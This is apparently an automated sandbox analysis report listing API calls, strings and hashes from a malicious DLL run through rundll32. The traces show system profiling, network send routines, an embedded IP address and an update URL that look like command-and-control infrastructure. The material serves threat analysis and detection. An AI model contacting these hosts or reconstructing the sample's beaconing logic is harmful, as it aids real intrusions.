                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpywsprintf
                    • String ID: Enable$SOFTWARE\%s\$UnKnow
                    • API String ID: 1685617284-1753358750
                    • Opcode ID: 98f42faf1801a72113cdb7658114b68778f5985d6daf369cc8498bc76bc398ec
                    • Instruction ID: 84d04d750ff7c636e3a5f66f236081115cf71b5b07c7030f5f33424a46cce23d
                    • Opcode Fuzzy Hash: 98f42faf1801a72113cdb7658114b68778f5985d6daf369cc8498bc76bc398ec
                    • Instruction Fuzzy Hash: 7A11E7F1A80308ABE724EB60DD4AFDA7378DF44704F405499F74476081EA727A55CB90
                    APIs
                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000,Time), ref: 04EC3C11
                    • _memset.LIBCMT ref: 04EC3C23
                    • _strtok.LIBCMT ref: 04EC3C34
                      • Part of subcall function 04EB31C7: __getptd.LIBCMT ref: 04EB31E5
                    • _strtok.LIBCMT ref: 04EC3C4F
                    • lstrcpyA.KERNEL32(user,00000000), ref: 04EC3C61
                    • CreateThread.KERNEL32(00000000,00000000,04EB2000,00000000,00000000,00000000), ref: 04EC3C76
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _strtok$CreateFolderPathSpecialThread__getptd_memsetlstrcpy
                    • String ID: Time$user
                    • API String ID: 3212501827-4045029352
                    • Opcode ID: 978d9a8a5e217a6678e5abb76292fb750cb6fa7cddea536d5de04ca1544e16fa
                    • Instruction ID: ad6dae59a5afdb4da92e253df2421d8c820240c0ec9ef2287d0542ed2917becb
                    • Opcode Fuzzy Hash: 978d9a8a5e217a6678e5abb76292fb750cb6fa7cddea536d5de04ca1544e16fa
                    • Instruction Fuzzy Hash: 23012470B80314BBF634A7689D07FEA3A589F04B06F501198FF84A91C0EAE07A4686F5
                    APIs
                      • Part of subcall function 6D05A669: CreateFileW.KERNEL32(00000000,00000000,?,6D05AA71,?,?,00000000,?,6D05AA71,00000000,0000000C), ref: 6D05A686
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D05AADC
                    • __dosmaperr.LIBCMT ref: 6D05AAE3
                    • GetFileType.KERNEL32(00000000), ref: 6D05AAEF
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D05AAF9
                    • __dosmaperr.LIBCMT ref: 6D05AB02
                    • CloseHandle.KERNEL32(00000000), ref: 6D05AB22
                    • CloseHandle.KERNEL32(6D0642E9), ref: 6D05AC6F
                    • GetLastError.KERNEL32 ref: 6D05ACA1
                    • __dosmaperr.LIBCMT ref: 6D05ACA8
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID:
                    • API String ID: 4237864984-0
                    • Opcode ID: 3da4d02d748d37a1d761957d46c518c58fe4423c420a23994fac38fd56053435
                    • Instruction ID: f28f3a5f21bf7efb4222eb2eb6da1fe1f8574e08d9ad8698dc83b10670db9fa4
                    • Opcode Fuzzy Hash: 3da4d02d748d37a1d761957d46c518c58fe4423c420a23994fac38fd56053435
                    • Instruction Fuzzy Hash: 55A13632A181559FEF098F68D951FAD7BB1AB07324F240159EC11EF2D1C735A822CB61
                    APIs
                    • _memset.LIBCMT ref: 04EC3F0C
                    • _memset.LIBCMT ref: 04EC3F1D
                      • Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DC6
                      • Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DD9
                      • Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DEC
                      • Part of subcall function 04EC4D60: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4DF9
                      • Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04EC4E13
                      • Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4E21
                      • Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04EC4E2F
                      • Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04EC4E37
                      • Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4E3F
                      • Part of subcall function 04EC4D60: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4E6C
                      • Part of subcall function 04EC4D60: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC5003
                    • lstrlenA.KERNEL32(00000000), ref: 04EC3F44
                    • lstrcpyA.KERNEL32(04EF8138,UnKnow), ref: 04EC3F5E
                    Strings
                    • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 04EC3F33
                    • UnKnow, xrefs: 04EC3F54
                    • ProcessorNameString, xrefs: 04EC3F26
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$UnKnow
                    • API String ID: 91903147-1449962935
                    • Opcode ID: ba3f371e4741e4df8f574bddeeccc4be4bd845040c0dc9804d843f2bc799c311
                    • Instruction ID: 84d48924d11298586a802494d5d4d2067253e95e29ef76c5ade5750fd0f06daf
                    • Opcode Fuzzy Hash: ba3f371e4741e4df8f574bddeeccc4be4bd845040c0dc9804d843f2bc799c311
                    • Instruction Fuzzy Hash: A9012670740308ABE714EBE49D03FDD7374AB44B05F105218BA467A1C4DAB47A09CA95
                    APIs
                    • __RTC_Initialize.LIBCMT ref: 6D048BD5
                    • ___scrt_uninitialize_crt.LIBCMT ref: 6D048BEF
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Initialize___scrt_uninitialize_crt
                    • String ID:
                    • API String ID: 2442719207-0
                    • Opcode ID: 5b2feaf3467d7381ae5252659505078c3e89426dc01f53360d414387c858cbe7
                    • Instruction ID: 93db8cb4483c81670f32b7deede352f5243d0af62b21a3945154fdfac08e3d75
                    • Opcode Fuzzy Hash: 5b2feaf3467d7381ae5252659505078c3e89426dc01f53360d414387c858cbe7
                    • Instruction Fuzzy Hash: 8F41D572D0A619EFFB119FA5CA40FAE7BB4EB857A4F11C93AE91467290C7304D418BD0
                    APIs
                      • Part of subcall function 6D01C090: getaddrinfo.WS2_32(?,?,?,?), ref: 6D01C0B1
                    • WSAGetLastError.WS2_32 ref: 6CFFF5D1
                    • WSAGetLastError.WS2_32 ref: 6CFFF5D7
                    • EnterCriticalSection.KERNEL32(?), ref: 6CFFF5EE
                    • LeaveCriticalSection.KERNEL32(?), ref: 6CFFF5FC
                    • send.WS2_32(?,?), ref: 6CFFF62B
                    • WSAGetLastError.WS2_32 ref: 6CFFF635
                    • LeaveCriticalSection.KERNEL32(?), ref: 6CFFF643
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalErrorLastSection$Leave$Entergetaddrinfosend
                    • String ID:
                    • API String ID: 1962273317-0
                    • Opcode ID: 82e7fa39c3969d52ac189780bb4f6fa51eb7b81949c4288554d950475c9387a2
                    • Instruction ID: ec66121f14198de3d98f867200e1df05203b2902541bc923910dfb17062b3852
                    • Opcode Fuzzy Hash: 82e7fa39c3969d52ac189780bb4f6fa51eb7b81949c4288554d950475c9387a2
                    • Instruction Fuzzy Hash: 6221A0711047009FE721DF66C844B5BB7F8FF06308F044A29E5A6D2560D771E50ACF51
                    APIs
                      • Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
                      • Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
                      • Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
                      • Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB
                    • wsprintfA.USER32 ref: 04EC3E84
                    • lstrcpyA.KERNEL32(00000004,---+++***bbb,04EC4A7C), ref: 04EC3EAF
                    • lstrcpyA.KERNEL32(00000004,81.31.208.36,04EC4A7C), ref: 04EC3ECD
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
                    • String ID: ---+++***bbb$81.31.208.36$CopyC$Time
                    • API String ID: 98932487-3096327760
                    • Opcode ID: 8a3220f28b0be61a6dbaa709e813dbde71150efaf1f0904d1a8d1abb264e59b9
                    • Instruction ID: ef9d32df536fe1ab89aefb4cc08679320cbb51d8d8aa948ca4a6cf7e526d6952
                    • Opcode Fuzzy Hash: 8a3220f28b0be61a6dbaa709e813dbde71150efaf1f0904d1a8d1abb264e59b9
                    • Instruction Fuzzy Hash: 27213B76600311DFD704CF59E849BDA7765FB8831AF0045BDDD4987200EB35B91AC790
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,6D0630D6,6D04EA46,?,00000000,CE3BFFFF,00000000,?,6D063340,00000022,FlsSetValue,6D0815C4,6D0815CC,CE3BFFFF), ref: 6D063088
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: 4b6dca9b8cf15c4c12f5de1059241d87a8c60645fede76162a18fcbeea36e828
                    • Instruction ID: a8f500b475a66bc1165c0975b5958f988da3e542f26301c5dbe50ddcf7493235
                    • Opcode Fuzzy Hash: 4b6dca9b8cf15c4c12f5de1059241d87a8c60645fede76162a18fcbeea36e828
                    • Instruction Fuzzy Hash: A821D532A05266A7FB229B25DC50B5E37B8AB4B774F250210F915A72C1DB30E904CAF0
                    APIs
                    • EnterCriticalSection.KERNEL32(76232460,76938400,04ECB824), ref: 04EC75A4
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04EC75BD
                    • _rand.LIBCMT ref: 04EC75CC
                    • wsprintfA.USER32 ref: 04EC7641
                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 04EC7746
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
                    • String ID:
                    • API String ID: 54394521-0
                    • Opcode ID: 13b4e6424b11e8b1f44a9df015518219a632f1c6b17112158d024255caeced91
                    • Instruction ID: e185a54f93de50893c1c74b6e4db359a63fb573e6aafd0d0cbbf4811fbc48a16
                    • Opcode Fuzzy Hash: 13b4e6424b11e8b1f44a9df015518219a632f1c6b17112158d024255caeced91
                    • Instruction Fuzzy Hash: 4851AEB1A00516AFDB15DF69CD84AAAF7A8FF04318B04966DE819D7200DB34FA56CFD0
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: dllmain_raw$dllmain_crt_dispatch
                    • String ID:
                    • API String ID: 3136044242-0
                    • Opcode ID: caac3a85cb19309924262230419df1d399746f6dde916a6ca52609e1db37150d
                    • Instruction ID: a37c56d6aebf441f708bbf0814d819c12ab6c889eb3c83e7871512cb3249236b
                    • Opcode Fuzzy Hash: caac3a85cb19309924262230419df1d399746f6dde916a6ca52609e1db37150d
                    • Instruction Fuzzy Hash: 6E217471D0661AEEEB129E55C940F7F3AB9EB91A94B01C936FC1467250D3308D418BD0
                    APIs
                    • send.WS2_32(?,?,00002000,00000000), ref: 04EC7164
                    • Sleep.KERNEL32(0000001E), ref: 04EC7172
                    • Sleep.KERNEL32(0000001E), ref: 04EC718E
                    • send.WS2_32(?,?,00000000,00000000), ref: 04EC71C1
                    • Sleep.KERNEL32(00000064), ref: 04EC71CF
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep$send
                    • String ID:
                    • API String ID: 4079979460-0
                    • Opcode ID: 6265d3ed58c05bbe43ed8b377f881081594c64c0fffdac1cd914c11bc06ec6cf
                    • Instruction ID: b32eb20b652daf0c4e9ac0a6589fbcf953d0187cfc47843952cc657c1d2ee629
                    • Opcode Fuzzy Hash: 6265d3ed58c05bbe43ed8b377f881081594c64c0fffdac1cd914c11bc06ec6cf
                    • Instruction Fuzzy Hash: CF21C371901309AFE7248BA9C9CCB8D7BB5FB44355F205269FC05D7381C674AE86CB50
                    APIs
                    • setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
                    • CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
                    • closesocket.WS2_32(?), ref: 04EC724B
                    • SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                    • String ID:
                    • API String ID: 1486965892-0
                    • Opcode ID: e3f2022e8cda22d72feb2bff6668fa77ca5ebfc0e1ff0b87f450be09e86d4be1
                    • Instruction ID: 54de95bfc60497dd4621745caf6b8dad68da96cd08fa25cbc9d00f2c776d23f6
                    • Opcode Fuzzy Hash: e3f2022e8cda22d72feb2bff6668fa77ca5ebfc0e1ff0b87f450be09e86d4be1
                    • Instruction Fuzzy Hash: 5AF090B1100700EBC360DBA0E849F9677BDEB48311F008A1CB65A86295CB74A804CB61
                    APIs
                    • CertCloseStore.CRYPT32(?,00000000), ref: 6D01D3A8
                    Strings
                    • schannel: shutting down SSL/TLS connection with %s port %d, xrefs: 6D01D1F7
                    • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 6D01D32F
                    • schannel: ApplyControlToken failure: %s, xrefs: 6D01D276
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CertCloseStore
                    • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %d
                    • API String ID: 3257488527-3473387036
                    • Opcode ID: d7e93c027c63a36444d247942e96c0d3707e1dceffda553a02abb30f67cb5ae2
                    • Instruction ID: 14ae17c84232da3013d741352abc7fda39bb0c7bfb675e1e1595910a83f5f858
                    • Opcode Fuzzy Hash: d7e93c027c63a36444d247942e96c0d3707e1dceffda553a02abb30f67cb5ae2
                    • Instruction Fuzzy Hash: 557127B0508701AFEB20CF64CD44B6BB7F8BB89308F10091CF59997691E775E954CBA2
                    APIs
                    • connect.WS2_32(000000FF,?,00000000), ref: 6D0358E8
                    • WSAGetLastError.WS2_32 ref: 6D0358F7
                    • WSASetLastError.WS2_32(?), ref: 6D03592A
                    Strings
                    • connect to %s port %u failed: %s, xrefs: 6D035953
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$connect
                    • String ID: connect to %s port %u failed: %s
                    • API String ID: 375857812-2835513649
                    • Opcode ID: 8b9b8ab5e904a661ddd73de238a2542d8ad5d5a43d71b8d2534f8965284ae8a6
                    • Instruction ID: eca2aed9aad9ac613b9fcee04e93adcb72a0d785fbd98abdf58fee7941d84d06
                    • Opcode Fuzzy Hash: 8b9b8ab5e904a661ddd73de238a2542d8ad5d5a43d71b8d2534f8965284ae8a6
                    • Instruction Fuzzy Hash: F551E430508757AFF7118B34CC44BF6B7E8AF06324F424629EAAD872A1DB61A594C7A1
                    APIs
                    • getsockname.WS2_32(?,?,?), ref: 6D0370A3
                    • WSAGetLastError.WS2_32(?,00000000,?), ref: 6D0370AD
                      • Part of subcall function 6D01A850: GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853
                    Strings
                    • getsockname() failed with errno %d: %s, xrefs: 6D0370CA
                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6D03713C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$getsockname
                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                    • API String ID: 3066790409-2605427207
                    • Opcode ID: ec819491e7f6e45c89e13b539b8a9f1170278a0389c0c35fdff351488f19b853
                    • Instruction ID: e7fbdcbfdb55cd090b5efcde4e505d36f6be34a6fee2edb473ceefbb0c971250
                    • Opcode Fuzzy Hash: ec819491e7f6e45c89e13b539b8a9f1170278a0389c0c35fdff351488f19b853
                    • Instruction Fuzzy Hash: 6E212376508201BFE720EB64DC41FEB73ECAF49318F858829FA49D7141EF35690987A2
                    APIs
                      • Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
                      • Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435
                      • Part of subcall function 6D00C020: GetModuleHandleA.KERNEL32(kernel32,00000000,?,secur32.dll,6D03B80D,secur32.dll,00000004,00000000,00000000,00000002,00000002,6D00C1D4), ref: 6D00C02A
                    • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6D03B81F
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                    • API String ID: 1646373207-3788156360
                    • Opcode ID: a4b787fe27984102b8a9886f07a5b754acfec3f9474c9579d61a8169ffe98713
                    • Instruction ID: 0d06947ed945953341c877b6b34a4a113040f6fb9f784b0966a07bb8f9caf33f
                    • Opcode Fuzzy Hash: a4b787fe27984102b8a9886f07a5b754acfec3f9474c9579d61a8169ffe98713
                    • Instruction Fuzzy Hash: A0F0A7B430070767FF244B358C1AB2E22E19782749F518038A709DA6C1EB34C800CA5C
                    APIs
                    • _memset.LIBCMT ref: 04EC3FD3
                    • lstrcatA.KERNEL32(04EF8238,04ECBCE4,?,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC406B
                      • Part of subcall function 04EC34F0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,04EF6A00,00000000,?,?,04EC3FFE), ref: 04EC3501
                    • lstrcatA.KERNEL32(04EF8238,04ECBC04,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC4017
                    • lstrcatA.KERNEL32(04EF8238,04ECB7B4,?,00000000,00000000,?,04EC4334,00000000,?,?,?,?,?,?,762323A0), ref: 04EC4023
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcat$CreateSnapshotToolhelp32_memset
                    • String ID:
                    • API String ID: 2821338896-0
                    • Opcode ID: 811c285e3ae8ac330fb7e2e8fb0a7bc66762348679af4b5878d181c2a6fd3fdf
                    • Instruction ID: e27071de8886977b68615e5720414d3977aed4d6a63b40ec52520ba13f60f469
                    • Opcode Fuzzy Hash: 811c285e3ae8ac330fb7e2e8fb0a7bc66762348679af4b5878d181c2a6fd3fdf
                    • Instruction Fuzzy Hash: F3113871B407006BFA146FE8AD5BA577358EF8179CB046128FE8597101EA71F8238BE1
                    APIs
                      • Part of subcall function 6CFF5C00: AcquireSRWLockExclusive.KERNEL32(6D08A44C,?,6CFF1EB7,93BD9D6B,76230BD0,76230F00), ref: 6CFF5C06
                      • Part of subcall function 6CFF5C00: ReleaseSRWLockExclusive.KERNEL32(6D08A44C,76230F00), ref: 6CFF5C2A
                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CFF1F56
                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CFF209E
                    Strings
                    • https://www.dj5a2sbj.icu/yj/update.xml, xrefs: 6CFF1F65
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
